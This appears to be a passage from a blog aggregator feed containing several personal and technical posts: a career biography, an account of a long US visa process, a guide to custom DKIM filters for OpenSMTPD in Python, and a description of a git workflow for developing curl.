We run one of the oldest bug bounty programs out there, and we really enjoy and encourage direct participation on Bugzilla. The direct communication with our developers and security engineers helps you gain insight into browser development and allows us to gain new perspectives.

Furthermore, we will continue to have guest blog posts for interesting bugs here. If you want to learn more about our security internals, follow us on Twitter @attackndefense or subscribe to our RSS feed.

Finally, thanks to Chris for reporting this interesting bug!

Eric ShepherdAmazon Wins Sheppy

Following my departure from the MDN documentation team at Mozilla, I’ve joined the team at Amazon Web Services, documenting the AWS SDKs. Which specific SDKs I’ll be covering is still being finalized; we have some in mind, but we’re still determining who will prioritize which, so I’ll hold off on being more specific.

Instead of going into details on my role on the AWS docs team, I thought I’d write a new post that provides a more in-depth introduction to myself than the little mini-bios strewn throughout my onboarding forms. Not that I know if anyone is interested, but just in case they are…

Personal

Now a bit about me. I was born in the Los Angeles area, but my family moved around a lot when I was a kid due to my dad’s work. By the time I left home for college at age 18, we had lived in California twice (where I began high school), Texas twice, Colorado twice, and Louisiana once (where I graduated high school). We also lived overseas once, near Pekanbaru, Riau Province on the island of Sumatra in Indonesia. It was a fun and wonderful place to live. Even though we lived in a company town called Rumbai, and were thus partially isolated from the local community, we still lived in a truly different place from the United States, and it was a great experience I cherish.

My wife, Sarah, and I have a teenage daughter, Sophie, who’s smarter than both of us combined. When she was in preschool and kindergarten, we started talking about science in pretty detailed ways. I would give her information and she would draw conclusions that were often right, thinking up things that essentially were black holes, the big bang, and so forth. It was fun and exciting to watch her little brain work. She’s in her “nothing is interesting but my 8-bit chiptunes, my game music, the games I like to play, and that’s about it” phase, and I can’t wait until she’s through that and becomes the person she will be in the long run. Nothing can bring you so much joy, pride, love, and total frustration as a teenage daughter.

Education

I got my first taste of programming on a TI-99/4 computer bought by the Caltex American School there. We were all given a little bit of a programming lesson just to get a taste of it, and I was captivated from the first day, when I got it to print a poem based on “Roses are red, violets are blue” to the screen. We were allowed to book time during recesses and before and after school to use the computer, and I took every opportunity I could to do so, learning more and more and writing tons of BASIC programs on it.

This included my masterpiece: a game called “Alligator!” in which you drove an alligator sprite around with the joystick, eating frogs that bounced around the screen while trying to avoid the dangerous bug that was chasing you. When I discovered that other kids were using their computer time to play it, I was permanently hooked.

I continued to learn and expand my skills over the years, moving on to various Apple II (and clone) computers, eventually learning 6502 and 65816 assembly, Pascal, C, dBase IV, and other languages.

During my last couple years of high school, I got a job at a computer and software store (which was creatively named “Computer and Software Store”) in Mandeville, Louisiana. In addition to doing grunt work and front-of-store sales, I also spent time doing programming for contract projects the store took on. My first was a simple customer contact management program for a real estate office. My most complex completed project was a three-store cash register system for a local chain of taverns and bars in the New Orleans area. I also built most of a custom inventory, quotation, and invoicing system for the store, though this was never finished due to my departure to start college.

The project of which I was most proud: a program for tracking information and progress of special education students and students with special needs for the St. Tammany Parish School District. This was built to run on an Apple IIe computer, and I was delighted to have the chance to build a real workplace application for my favorite platform.

I attended the University of California—Santa Barbara with a major in computer science. I went through the program and reached the point where I only needed 12 more units (three classes): one general education class under the subject area “literature originating in a foreign language” and two computer science electives. When I went to register for my final quarter, I discovered that none of the computer science classes offered that quarter were ones I could take to fulfill my requirements (I’d either already taken them or they were outside my focus area, and thus wouldn’t apply).

Thus I withdrew from school for a quarter with the plan that I would try again for the following quarter. During the interim, I became engaged to my wife and took my first gaming industry job (where they promised to allow me leave, with benefits, for the duration of my winter quarter back at school). As the winter approached, I drove up to UCSB to get a catalog and register in person. Upon arrival, I discovered that, once again, there were no computer science offerings that would fulfill my requirements.

At that point, I was due to marry in a few months (during the spring quarter), my job was getting more complicated due to the size and scope of the projects I was being assigned, and the meaningfulness of the degree was decreasing as I gained real work experience.

Thus, to this day, I remain just shy of my computer science degree. I have regrets at times, but never so much so that it makes sense to go back. Especially given the changed requirements and the amount of extra stuff I’d probably have to take. My experience at work now well outweighs the benefits of the degree.

The other shoe…

Time to drop that other shoe. I have at least one, and possibly two, chronic medical conditions that complicate everything I do. If there are two such conditions, they’re similar enough that I generally treat them as one when communicating with non-doctors, so that’s what I’ll do here.

I was born with tibiae (lower leg bones) that were twisted outward abnormally. This led to me walking with feet that were pointed outward at about a 45° angle from normal. This, along with other less substantial issues with the structure of my legs, was always somewhat painful, especially when doing things which really required my feet to point forward, such as walking on a narrow beam, skating, or trying to water ski.

Over time, this pain became more constant, and began to change. I noticed numbness and tingling in my feet and ankles, along with sometimes mind-crippling levels of pain. In addition, I developed severe pain in my neck, shoulders, and both arms. Over time, I began to have spasms, in which it felt like I was being blasted by an electric shock, causing my arms or legs to jerk wildly. At times, I would find myself uncontrollably lifting my mouse off the desk and slamming it down, or even throwing it to the floor, due to these spasms.

Basically, my nervous system has run amok. Due, we think, to a lifetime of strain and pressure caused by my skeletal structure issues, the nerves have been worn and become permanently damaged in various places. This can’t be reversed, and the pain I feel every moment of every day will never go away.

I engage in various kinds of therapy, both physical and medicinal, and the pain is kept within the range of “ignorable” much of the time. But sometimes it spikes out of that range and becomes impossible to ignore, leading to me not being able to focus clearly on what I’m doing. Plus there are times when it becomes so intense, all I can do is curl up and ride it out. This can’t be changed, and I’ve accepted that. We do our best to manage it and I’m grateful to have access to the medical care I have.

This means, of course, that I have times during which I am less attentive than I would like to be, or have to take breaks to ride out pain spikes. On less frequent occasions, I have to write a day off entirely when I simply can’t shake the pain at all. I have to keep warm, too, since cold (even a mild chill or a slight cooling breeze) can trigger the pain to spike abruptly.

But I’ve worked out systems and skills that let me continue to do my work despite all this. The schedule can be odd, and I have to pause my work for a while a few times a week, but I get the job done.

I wrote a longer and more in-depth post about my condition and how it feels a few years ago, if you want to know more.

Hobbies and free time

My very favorite thing to do in my free time is to write code for my good old Apple II computers. Or, barring that, to work on the Apple IIgs emulator for the Mac that I’m the current developer for. I dabble in Mac and iOS code and have done a few small projects for my own use. However, due to my medical condition, I don’t get to spend as much time doing that as I would like.

With the rest of my free time, I love to watch movies and read books. So very, very many books. My favorite genres are science fiction and certain types of mysteries and crime thrillers, though I dabble in other areas as well. I probably read, on average, four to six novels per week.

I also love to play various types of video games. I have an Xbox One, but I don’t play on it much (I got it mostly to watch 4K Blu-Ray discs on it), though I do have a few titles for it. I’ve played and enjoyed the Diablo games as well as StarCraft, and have been captivated by many of the versions of Civilization over the years (especially the original and Civ II). I also, of course, play several mobile games.

My primary gaming focus has been World of Warcraft for years. I was a member of a fairly large guild for a few years, then joined a guild that split off from it, but that guild basically fell apart. Only a scant handful of us are left, and none of us really feel like hunting for another guild, and since we enjoy chatting while we play, we do fine. It’d be interesting, though, to find coworkers that play and spend some time with them.

Career

I began my career as a software engineer for a small game development shop in Southern California. My work primarily revolved around porting games from other platforms to the Mac, though I did also do small amounts of Windows development at times. I ported a fair number of titles to Mac, most of which most people probably don’t remember—if they ever heard of them at all—but some of them were actually pretty good games. I led development of a Mac/Windows game for kids which only barely shipped due to changing business conditions with the publisher, and by then I was pretty much fed up with the stress of working in the games industry.

Over the years, I’ve picked up, or at least used, a number of languages, including C++ (though I’ve not written any in years now), JavaScript, Python, Perl, and others. I love trying out new languages, and I’ve left out a lot of the ones I experimented with and abandoned over the years.

Be

By that point, I was really intrigued by the Be Operating System, and started trying to get a job there. The only opening I wasn’t painfully under-qualified for was a technical writing position. It occurred to me that I’ve always written well (according to teachers and professors, at least), so I applied and eventually secured a junior writer job on the BeOS documentation team.

Within seven months, I was a senior technical writer and was deeply involved in writing the Be Developers Guide (more commonly known as the Be Book) and Be Advanced Topics (which are still the only two published books which contain anything I’ve written). Due to the timing of my arrival, very little for my work is in the Be Book, but broad sections of Be Advanced Topics were written by me.

Palm

Unfortunately, for various reasons, BeOS wasn’t able to secure a large enough chunk of the market to succeed, and our decline led to our acquisition by Palm, the manufacturers of the Palm series of handhelds. We were merged into the various teams there, with myself joining the writing team for Palm OS documentation.

Within just a handful of weeks, the software team, including those of us documenting the operating system, was spun off into a new company, PalmSource. There, I worked on documentation updates for Palm OS 5, as well as updated and brand-new documentation for Palm OS 6 and 6.1.

My most memorable work was done on the rewrites and updates of the Low-Level Communications Guide and the High-Level Communications Guide, as well as on various documents for licensees’ use only. I also wrote the Binder Guide for Palm OS 6, and various other things. It was fascinating work, though ultimately and tragically doomed due to the missteps with the Palm OS 6 launch and the arrival of the iPhone three years after my departure from PalmSource.

Unfortunately, neither the Palm OS 6 update nor its follow-up, version 6.1, saw significant use during my tenure, due to the vast changes in the platform that were made in order to modernize the operating system for future devices. The OS was also sluggish in Palm OS 6, though 6.1 was quite peppy and really very nice. But the writing was on the wall there and, though I survived three or four rounds of layoffs, eventually I was cut loose.

After PalmSource let me go, I returned briefly to the games industry, finalizing the ports of a couple of games to the Mac for Reflexive Entertainment (now part of Amazon): Ricochet Lost Worlds and Big Kahuna Reef. I departed Reflexive shortly after completing those projects, deciding I wanted to return to technical writing, or at least something not in the game industry.

Mozilla

That’s why my friend Dave Miller, who was at the time on the Bugzilla team as well as working in IT for Mozilla, recommended me for a Mac programming job at Mozilla. When I arrived for my in-person interviews, I discovered that they had noticed my experience as a writer and had shunted me over to interview for a writing job instead. After a very long day of interviews and a great deal of phone and email tag, I was offered a job as a writer on the Mozilla Developer Center team.

And there I stayed for 14 years, through the changes in documentation platform (from MediaWiki to DekiWiki to our home-built Kuma platform), the rebrandings (to Mozilla Developer Network, then to simply MDN, then MDN Web Docs), and the growth of our team over time. I began as the sole full-time writer, and by our peak as a team we had five or six writers. The MDN team was fantastic to work with, and the work had enormous meaning. We became over time the de-facto official documentation site for web developers.

My work spanned a broad range of topics, from the basics of HTML and CSS to the depths of WebRTC, WebSockets, and other, more arcane topics. I loved doing the work, with the deep dives into the source code of the major browsers to ensure I understood how things worked and why, and the reading of specifications for new APIs.

Knowing that my work was not only used by millions of developers around the world, but was being used by teachers, professors, and students, as well as others who just wanted to learn, was incredibly satisfying. I loved doing it and I’m sure I’ll always miss it.

But between the usual business pressures and the great pandemic of 2020, I found myself laid off by Mozilla in mid-2020. That leads me to my arrival at Amazon a few weeks later, where I started on October 26.

Amazon!

So here we are! I’m still onboarding, but soon enough, I’ll be getting down to work, making sure my parts of the AWS documentation are as good as they can possibly be. Looking forward to it!

Daniel Stenberga US visa in 937 days

Here’s the complete timeline of events. From my first denial to travel to the US until I eventually received a tourist visa. And then I can’t go anyway.

December 5-11, 2016

I spent a week on Hawaii with Mozilla – my employer at the time. This was my 12th visit to the US over a period of 19 years. I went there on ESTA, the visa waiver program Swedish citizens can use. I’ve used it many times, there was nothing special this time. The typical procedure with ESTA is that we apply online: fill in a form, pay a 14 USD fee and get a confirmation within a few days that we’re good to go.

<figcaption>I took this photo at the hotel we stayed at during the Mozilla all-hands on Hawaii 2016.</figcaption>

June 26, 2017

In the early morning one day, at the check-in counter at Arlanda airport in Sweden, I was refused boarding on my flight. Completely unexpected and out of the blue! I thought I was going to San Francisco via London with British Airways, but instead I had to turn around and go back home – slightly shocked. According to the lady behind the counter there was “something wrong with my ESTA”. I used the same ESTA and passport as I had used just fine back in December 2016. They’re made to last two years and it had not expired.

<figcaption>Tweeted by me, minutes after being stopped at Arlanda.</figcaption>

People engaged by Mozilla to help us out could not figure out or get answers about what the problem was (questions and investigations were attempted both in the US and in Sweden), so we put our hopes on that it was a human mistake somewhere and decided to just try again next time.

April 3, 2018

I missed the following meeting (in December 2017) for other reasons but in the summer of 2018 another Mozilla all-hands meeting was coming up (in Texas, USA this time) so I went ahead and applied for a new ESTA in good time before the event – as I was a bit afraid there was going to be problems. I was right and I got denied ESTA very quickly. “Travel Not Authorized”.

<figcaption>Rejected from the ESTA program.</figcaption>

Day 0 – April 17, 2018

Gaaah. It meant it was no mistake last year, they actually mean this. I switched approach and instead applied for a tourist visa. I paid 160 USD, filled in a ridiculous amount of information about me and my past travels over the last 15 years and I visited the US embassy for an in-person interview and fingerprinting.

This is day 0 in the visa process, 296 days after I was first stopped at Arlanda.

Day 90 – July 2018

I missed the all-hands meeting in San Francisco when I didn’t get the visa in time.

Day 240 – December 2018

I quit Mozilla, so I then had no more reasons to go to their company all-hands…

Day 365 – April 2019

A year passed. “someone is working on it” the embassy email person claimed when I asked about progress.

Day 651 – January 28, 2020

I emailed the embassy to query about the process.

<figcaption>Screenshotted email</figcaption>

The reply came back quickly:

Dear Sir,

All applications are processed in the most expeditious manner possible. While we understand your frustration, we are required to follow immigration law regarding visa issuances. This process cannot be expedited or circumvented. Rest assured that we will contact you as soon as the administrative processing is concluded.

Day 730 – April 2020

Another year had passed and I had given up all hope. Now it turned into a betting game and science project. How long can they actually drag out this process without saying either yes or no?

Day 871 – September 3, 2020

A friend of mine, a US citizen, contacted his Congressman – Gerry Connolly – about my situation and asked for help. His office subsequently sent a question to the US embassy in Stockholm asking about my case. While the response that arrived on September 17 was rather negative…

your case is currently undergoing necessary administrative processing and regrettably it is not possible to predict when this processing will be completed.

… I think the following turn of events indicates it had an effect. It unclogged something.

Day 889 – September 22, 2020

After 889 days since my interview at the embassy (only five days after the answer to the congressman), the embassy contacted me over email. For the first time since that April day in 2018.

Your visa application is still in administrative processing. However, we regret to inform you that because you have missed your travel plans, we will require updated travel plans from you.

My travel plans – that had been out of date for the last 800 days or so – suddenly needed to be updated! As I was already so far into this process, and since I feared that stopping now and re-attempting at a later time would force me back to square one, I decided to arrange myself some updated travel plans. After all, I work for an American company and I have a friend or two there.

Day 900 – October 2, 2020

I replied to the call for travel plan details with an official invitation letter attached, inviting me to come visit my colleagues at wolfSSL, signed by our CEO, Larry. I really do want to do this at some point – I’ve never met most of them – so it wasn’t a made-up reason. I could possibly even have gotten some other friends to invite me to get the process going, but I figured this invite should be enough to keep the ball rolling.

Day 910 – October 13, 2020

I got another email. Now at 910 days since the interview. The embassy asked for my passport “for further processing”.

Day 913 – October 16, 2020

I posted my passport to the US embassy in Stockholm. I also ordered and paid for “return postage” as instructed so that they would ship it back to me in a safe way.

Day 934 – November 6, 2020

At 10:30 in the morning my phone lit up and showed me a text telling me that there’s an incoming parcel being delivered to me, shipped from “the Embassy of the United State” (bonus points for the typo).

Day 937 – November 9, 2020

I received my passport. Inside, there’s a US visa that is valid for ten years, until November 2030.

<figcaption>The upper left corner of the visa page in my passport…</figcaption>

As a bonus, the visa also comes with a NIE (National Interest Exception) that allows me a single entry to the US during the PP (Presidential Proclamations) – which restricts travel to the US from the European Schengen zone. In other words: I am actually allowed to travel right away!

The timing is fascinating. The last time I was in the US, Trump hadn’t taken office yet and I get the approved visa in my hands just days after Biden has been announced as the next president of the US.

Will I travel?

Covid-19 is still with us and there’s no end in sight to the pandemic. I will of course not travel to the US or any other country until it can be deemed safe and sensible.

When the pandemic is under control and traveling becomes viable, I am sure there will be opportunities. Hopefully the situation will improve before the visa expires.

Thanks to

All my family and friends, in the US and elsewhere, who have supported me and cheered me up through this entire process. Thanks for continuing to invite me to fun things in the US even though I’ve not been able to participate. Thanks for pushing for events to get organized outside of the US! I’m sorry I’ve missed social gatherings, a friend’s marriage and several conference speaking opportunities. Thanks for all the moral support throughout this long journey of madness.

A special thanks goes to David (you know who you are) for contacting Gerry Connolly’s office. I honestly think this was the key event that finally made things move in this process.

Wladimir PalantAdding DKIM support to OpenSMTPD with custom filters

If you, like me, are running your own mail server, you might have looked at OpenSMTPD. There are very compelling reasons for that, most important being the configuration simplicity. The following is a working base configuration handling both mail delivery on port 25 as well as mail submissions on port 587:

pki default cert "/etc/mail/default.pem"
pki default key "/etc/mail/default.key"

table local_domains {"example.com", "example.org"}

listen on eth0 tls pki default
listen on eth0 port 587 tls-require pki default auth

action "local" maildir
action "outbound" relay

match from any for domain <local_domains> action "local"
match for local action "local"
match auth from any for any action "outbound"
match from local for any action "outbound"

You might want to add virtual user lists, aliases, SRS support, but it really doesn’t get much more complicated than this. The best practices are all there: no authentication over unencrypted connections, no relaying of mails by unauthorized parties, all of that being very obvious in the configuration. Compare that to Postfix configuration with its multitude of complicated configuration files where I was very much afraid of making a configuration mistake and inadvertently turning my mail server into an open relay.

There is no DKIM support out of the box, however; you have to add filters for that. The documentation suggests using opensmtpd-filter-dkimsign, which most platforms don’t have prebuilt packages for. So you have to get the source code from some Dutch web server, presumably run by the OpenBSD developer Martijn van Duren. And what you get is a very simplistic DKIM signer, not even capable of supporting multiple domains.

The documentation suggests opensmtpd-filter-rspamd as an alternative, which can indeed both sign and verify DKIM signatures. It relies on rspamd however, an anti-spam solution introducing a fair deal of complexity and clearly oversized for my case.

So I went for writing custom filters. With dkimpy implementing all the necessary functionality in Python, how hard could it be?

Getting the code

You can see the complete code along with installation instructions here. It consists of two filters: dkimsign.py should be applied to outgoing mail and will add a DKIM signature, dkimverify.py should be applied to incoming mail and will add an Authentication-Results header indicating whether DKIM and SPF checks were successful. SPF checks are optional and will only be performed if the pyspf module is installed. Both filters rely on the opensmtpd.py module providing a generic filter server implementation.
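
For completeness, here is a rough sketch of how these filters could be hooked into the base configuration shown earlier – the install paths are placeholders, adjust them to wherever you put the scripts:

filter "dkimverify" proc-exec "/usr/local/bin/dkimverify.py"
filter "dkimsign" proc-exec "/usr/local/bin/dkimsign.py"

listen on eth0 tls pki default filter "dkimverify"
listen on eth0 port 587 tls-require pki default auth filter "dkimsign"

This declares the two filter processes and attaches the verifier to the port 25 listener (incoming mail) and the signer to the submission listener (outgoing mail).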

I have no time to maintain this code beyond what I need myself. This means in particular that I will not test it with any OpenSMTPD version other than the one I run myself (currently 6.6.4). So while it should work with OpenSMTPD 6.7.1, I haven’t actually tested it. Anybody willing to maintain this code is welcome to do so, and I will happily link to their repository.

Why support DKIM?

The DKIM mechanism allows recipients to verify that the email was really sent from the domain listed in the From field, thus helping combat spam and phishing mails. The goals are similar to Sender Policy Framework (SPF), and it’s indeed recommended to use both mechanisms. A positive side-effect: implementing these mechanisms should reduce the likelihood of mails from your server being falsely categorized as spam.

DKIM stands for DomainKeys Identified Mail and relies on public-key cryptography. The domain owner generates a signing key and stores its public part in a special DNS entry for the domain. The private part of the key is then used to sign the body and a subset of headers for each email. The resulting signature is added as DKIM-Signature: header to the email before it is sent out. The receiving mail server can look up the DNS entry and validate the signature.
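
To make the mechanism more concrete, here is roughly what the underlying dkimpy primitives look like – a minimal sketch with a made-up selector, domain and key path:

import dkim

message = b"From: me@example.org\r\nSubject: test\r\n\r\nHello\r\n"
with open("/path/to/private.key", "rb") as key_file:
    private_key = key_file.read()

# dkim.sign() returns the complete "DKIM-Signature: ..." header line
# that gets prepended to the message before it is sent out.
signature = dkim.sign(message, b"selector", b"example.org", private_key)

# The receiving side looks up selector._domainkey.example.org in DNS
# and checks the signature; dkim.verify() returns True or False.
print(dkim.verify(signature + message))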

The OpenSMTPD filter protocol

The protocol used by OpenSMTPD to communicate with its filters is described in the smtpd-filters(7) man page. It is text-based and fairly straightforward: report events and filter requests come in on stdin, filter responses go out on stdout.

So my FilterServer class will read the initial messages from stdin (OpenSMTPD configuration) when it is created. Then the register_handler() method should be called any number of times, which sends out a registration request for a report event or a filter request. And the serve_forever() method will tell OpenSMTPD that the filter is ready, read anything coming in on stdin and call the previously registered handlers.

So far very simple, if it weren’t for a tiny complication: when I tried this initially, mail delivery would hang. Eventually I realized that OpenSMTPD didn’t recognize the filter’s response, so it kept waiting for one. Debugging output wasn’t helpful, so it took me a while to figure this one out. A filter response is supposed to contain a session identifier and some opaque token for OpenSMTPD to match it to the correct request. According to the documentation, the session identifier goes first, but guess what: my slightly older OpenSMTPD version expects the token to go first.

The documentation doesn’t bother mentioning things that used to be different in previous versions of the protocol, a practice that OpenSMTPD developers will hopefully reconsider. And OpenSMTPD doesn’t bother logging filter responses with what it considers an unknown session identifier, as there are apparently legitimate scenarios where a session is removed before the corresponding filter response comes in.

This isn’t the only case where OpenSMTPD flipped parameter order recently. The parameters of the tx-mail report event are listed as message-id result address, yet the order was message-id address result in previous versions apparently. Sadly, not having documentation for the protocol history makes it impossible to tell whether your filter will work correctly with any OpenSMTPD version but the one you tested it with.

Making things more comfortable with session contexts

If one wants to look at the message body, the way to go is registering a handler for the data-line filter. This one will be called for every individual line however. So the handler would have to store previously received lines somewhere until it receives a single dot indicating the end of the message. Complication: this single dot might never come, e.g. if the other side disconnects without finishing the transfer. How does one avoid leaking memory in this case? The previously stored lines have to be removed somehow.

The answer is listening to the link-disconnect report event and clearing out any data associated with the session when it is received. And since all my handlers needed this logic, I added it to the FilterServer class implementation. Calling track_context() during registration phase will register link-connect and link-disconnect handlers, managing session context objects for all handlers. Instead of merely receiving a session identifier, the handlers will receive a context object that they can add more data to as needed.
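
Stripped of the specifics of my FilterServer class, the underlying idea is nothing more than a dictionary keyed by session identifier that is populated on link-connect and emptied on link-disconnect. A rough illustration of the concept (the handler signatures here are made up for the example, not the module’s actual API):

contexts = {}

def on_link_connect(session_id, *args):
    # a fresh context object for this session, e.g. for collecting lines
    contexts[session_id] = {'lines': []}

def on_link_disconnect(session_id, *args):
    # drop whatever was accumulated, even if the transfer never finished
    contexts.pop(session_id, None)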

Allowing higher level message filters

This doesn’t change the fact that data-line filters will typically keep collecting lines until they have a complete message. So I added a register_message_filter() method to FilterServer that encapsulates this logic. The handler registered here will always be called with a complete list of lines for the message. This method also makes sure that errors during processing won’t prevent the filter from generating a response; the message is properly rejected in that case.

Altogether this means that the DKIM signer now looks like this (logic slightly modified here for clarity):

def sign(context, lines):
    # re-assemble the message that the data-line filter collected for us
    message = email.message_from_string('\n'.join(lines))
    # extract_sender_domain() and config are elided here: config maps a
    # sender domain to the selector and key data configured for it
    domain = extract_sender_domain(message)
    if domain in config:
        signature = dkim_sign(
            '\n'.join(lines).encode('utf-8'),
            config[domain]['selector'],
            domain,
            config[domain]['keydata']
        )
        add_signature(message, signature)
        lines = message.as_string().splitlines(False)
    return lines

server = FilterServer()
server.register_message_filter(sign)
server.serve_forever()

The DKIM verifier is just as simple if you omit the SPF validation logic:

def verify(context, lines):
    message = email.message_from_string('\n'.join(lines))

    dkim_result = 'unknown'
    if 'dkim-signature' in message:
        if dkim_verify('\n'.join(lines).encode('utf-8')):
            dkim_result = 'pass'
        else:
            dkim_result = 'fail'

    # replace any pre-existing header so that a sender cannot spoof the result
    if 'authentication-results' in message:
        del message['authentication-results']
    message['Authentication-Results'] = 'localhost; dkim=' + dkim_result
    return message.as_string().splitlines(False)

server = FilterServer()
server.register_message_filter(verify)
server.serve_forever()

Drawbacks

This solution isn’t meant for high-volume servers. It has at least one significant issue: all processing happens sequentially. So while DKIM/SPF checks are being performed (25 seconds for DNS requests in the worst-case scenario) no other mails will be processed. This could be solved by running message filters on a separate thread, but the added complexity simply wasn’t worth the effort for my scenario.
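
For the record, a very rough sketch of what off-loading that work could look like with a standard-library thread pool – this is not part of the published code, and write_response() here is just a placeholder for whatever writes the protocol answer for a given session and token back to stdout (which still has to be serialized, hence the lock):

import threading
from concurrent.futures import ThreadPoolExecutor

pool = ThreadPoolExecutor(max_workers=4)
stdout_lock = threading.Lock()

def handle_message(session_id, token, lines):
    # the slow DKIM/SPF work now runs off the main thread
    result = verify(None, lines)
    with stdout_lock:
        # placeholder: emit the filter response for this session/token pair
        write_response(session_id, token, result)

# instead of calling handle_message() directly, the filter would submit it:
# pool.submit(handle_message, session_id, token, lines)

Whether that added complexity is worth it depends entirely on the mail volume.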

Daniel StenbergThis is how I git

Every now and then I get questions on how to work with git in a smooth way when developing, bug-fixing or extending curl – or how I do it. After all, I work on open source full time which means I have very frequent interactions with git (and GitHub). Simply put, I work with git all day long. Ordinary days, I issue git commands several hundred times.

I have a very simple approach and way of working with git in curl. This is how it works.

command line

I use git almost exclusively from the command line in a terminal. To help me see which branch I’m working in, I have this little bash helper script.

# print the currently checked out git branch (if any) in brackets,
# for embedding in the shell prompt below
brname () {
  a=$(git rev-parse --abbrev-ref HEAD 2>/dev/null)
  if [ -n "$a" ]; then
    echo " [$a]"
  else
    echo ""
  fi
}
PS1="\u@\h:\w\$(brname)$ "

That gives me a prompt that shows username, host name, the current working directory and the current checked out git branch.

In addition: I use Debian’s bash command line completion for git which is also really handy. It allows me to use tab to complete things like git commands and branch names.

git config

I of course also have my customized ~/.gitconfig file to provide me with some convenient aliases and settings. My most commonly used git aliases are:

st = status --short -uno
ci = commit
ca = commit --amend
caa = commit -a --amend
br = branch
co = checkout
df = diff
lg = log -p --pretty=fuller --abbrev-commit
lgg = log --pretty=fuller --abbrev-commit --stat
up = pull --rebase
latest = log @^{/RELEASE-NOTES:.synced}..

The ‘latest’ one is for listing all changes done to curl since the most recent RELEASE-NOTES “sync”. The others should hopefully be rather self-explanatory.

The config also sets gpgsign = true, enables mailmap and a few other things.

master is clean and working

The main curl development is done in the single curl/curl git repository (primarily hosted on GitHub). We keep the master branch the bleeding edge development tree and we work hard to always keep that working and functional. We do our releases off the master branch when that day comes (every eight weeks) and we provide “daily snapshots” from that branch, put together – yeah – daily.

When merging fixes and features into master, we avoid merge commits and use rebases and fast-forward as much as possible. This makes the branch very easy to browse, understand and work with – as it is 100% linear.

Work on a fix or feature

When I start something new, like work on a bug or trying out someone’s patch or similar, I first create a local branch off master and work in that. That is, I don’t work directly in the master branch. Branches are easy and quick to do and there’s no reason to shy away from having loads of them!

I typically name the branch prefixed with my GitHub user name, so that when I push it to the server it is clear who created it (and I can use the same branch name locally as I do remotely).

$ git checkout -b bagder/my-new-stuff-or-bugfix

Once I’ve gotten somewhere, I commit to the branch. It can end up being one or more commits before I consider myself “done for now” with what I set out to do.

I try not to leave the tree with any uncommitted changes – like if I take off for the day or even just leave for food or an extended break. This puts the repository in a state that allows me to easily switch over to another branch when I get back – should I feel the need to. Plus, it’s better to commit and explain the change before the break rather than having to recall the details again when coming back.

Never stash

“git stash” is therefore not a command I ever use. Instead, I create a new branch and commit the (temporary?) work in there as a potential new line of work.

Show it off and get reviews

Yes I am the lead developer of the project but I still maintain the same work flow as everyone else. All changes, except the most minuscule ones, are done as pull requests on GitHub.

When I’m happy with the functionality in my local branch – when the bug seems to be fixed, or the feature seems to be doing what it’s supposed to do, and the test suite runs fine locally – I clean up the commit series with “git rebase -i” (or, if it is a single commit, just “git commit --amend”).

The commit series should be a set of logical changes that are related to this change and not any more than necessary, but kept separate if they are separate. Each commit also gets its own proper commit message. Unrelated changes should be split out into their own separate branch and subsequent separate pull request.

$ git push origin bagder/my-new-stuff-or-bugfix

Make the push a pull request

On GitHub, I then make the newly pushed branch into a pull request (aka “a PR”). It will then become visible in the list of pull requests on the site for the curl source repository, it will be announced in the #curl IRC channel and everyone who follows the repository on GitHub will be notified accordingly.

Perhaps most importantly, a pull request kicks off a flood of CI jobs that will build and test the code in numerous different combinations and on several platforms, and the results of those tests will trickle in over the coming hours. When I write this, we have around 90 different CI jobs – per pull request – and something like 8 different code analyzers will scrutinize the change to see if there are any obvious flaws in there.

<figcaption>CI jobs per platform over time. Graph snapped on November 5, 2020</figcaption>

A branch in the actual curl/curl repo

Most contributors who work on curl would not do like me and make the branch in the curl repository itself, but would rather make it in their own forked version instead. The difference isn’t that big and I could of course also do it that way.

After push, switch branch

As it will take some time to get the full CI results from the PR to come in (generally a few hours), I switch over to the next branch with work on my agenda. On a normal work-day I can easily move over ten different branches, polish them and submit updates in their respective pull-requests.

I can go back to the master branch again with ‘git checkout master’ and there I can “git pull” to get everything from upstream – like when my fellow developers have pushed stuff in the meantime.

PR comments or CI alerts

If a reviewer or a CI job finds a mistake in one of my PRs, that becomes visible on GitHub and I get to work to handle it: either fix the bug or discuss with the reviewer what the better approach might be.

Unfortunately, flaky CI jobs are a part of life, so very often one or two red markers end up in the list of CI jobs that can be ignored, as their test failures are due to problems in the setup and not because of actual mistakes in the PR…

To get back to my branch for that PR again, I “git checkout bagder/my-new-stuff-or-bugfix”, and fix the issues.

I normally start out by doing follow-up commits that repair the immediate mistake and push them on the branch:

$ git push origin bagder/my-new-stuff-or-bugfix

If the number of fixup commits gets large, or if the follow-up fixes aren’t small, I usually end up doing a squash to reduce the number of commits into a smaller, simpler set, and then force-push them to the branch.

The reason for that is to make the patch series easy to review, read and understand. When a commit series has too many commits that change the previous commits, it becomes hard to review.

Ripe to merge?

When the pull request is ripe for merging (independently of who authored it), I switch over to the master branch again and merge the pull request’s commits into it. In special cases I cherry-pick specific commits from the branch instead. When everything that should be there has been properly brought into master, I push the changes to the remote.

Usually, and especially if the pull request wasn’t done by me, I also go over the commit messages and polish them somewhat before I push everything. Commit messages should follow our style and mention not only which PR they close but also which issue they fix, and properly give credit to the bug reporter and all the helpers – using the right syntax so that our automatic tools can pick them up correctly!

As already mentioned above, I merge fast-forward or rebased into master. No merge commits.

Never merge with GitHub!

There’s a button on GitHub that says “rebase and merge” that could theoretically be used for merging pull requests. I never use that (and if I could, I’d disable/hide it). The reasons are simply:

  1. I don’t feel that I have the proper control of the commit message(s)
  2. I can’t select to squash a subset of the commits, only all or nothing
  3. I often want to cleanup the author parts too before push, which the UI doesn’t allow

The downside of not using the merge button is that the message in the PR says “closed by [hash]” instead of “merged in…”, which causes confusion for a fair number of users who don’t realize that it actually means the same thing! I consider this a (long-standing) GitHub UX flaw.

Post merge

If there is nothing in the branch worth keeping around any more, I delete the local branch again with “git branch -d [name]” and I remove it remotely too – since it was completely merged, there’s no reason to keep the work version around.

At any given point in time, I have some 20-30 different local branches alive using this approach so things I work on over time all live in their own branches and also submissions from various people that haven’t been merged into master yet exist in branches of various maturity levels. Out of those local branches, the number of concurrent pull requests I have in progress can be somewhere between just a few up to ten, twelve something.

RELEASE-NOTES

Not strictly related, but in order to keep interested people informed about what’s happening in the tree, we sync the RELEASE-NOTES file every once in a while. Maybe every 5-7 days or so. It thus becomes a file that explains what we’ve worked on since the previous release, and it stays well-maintained and ready by the time release day comes.

To sync it, all I need to do is:

$ ./scripts/release-notes.pl

Which makes the script add suggested updates to it. I then load the file into my editor, remove the separation marker and all entries that don’t actually belong there (the script adds all commits as entries since it can’t judge their importance).

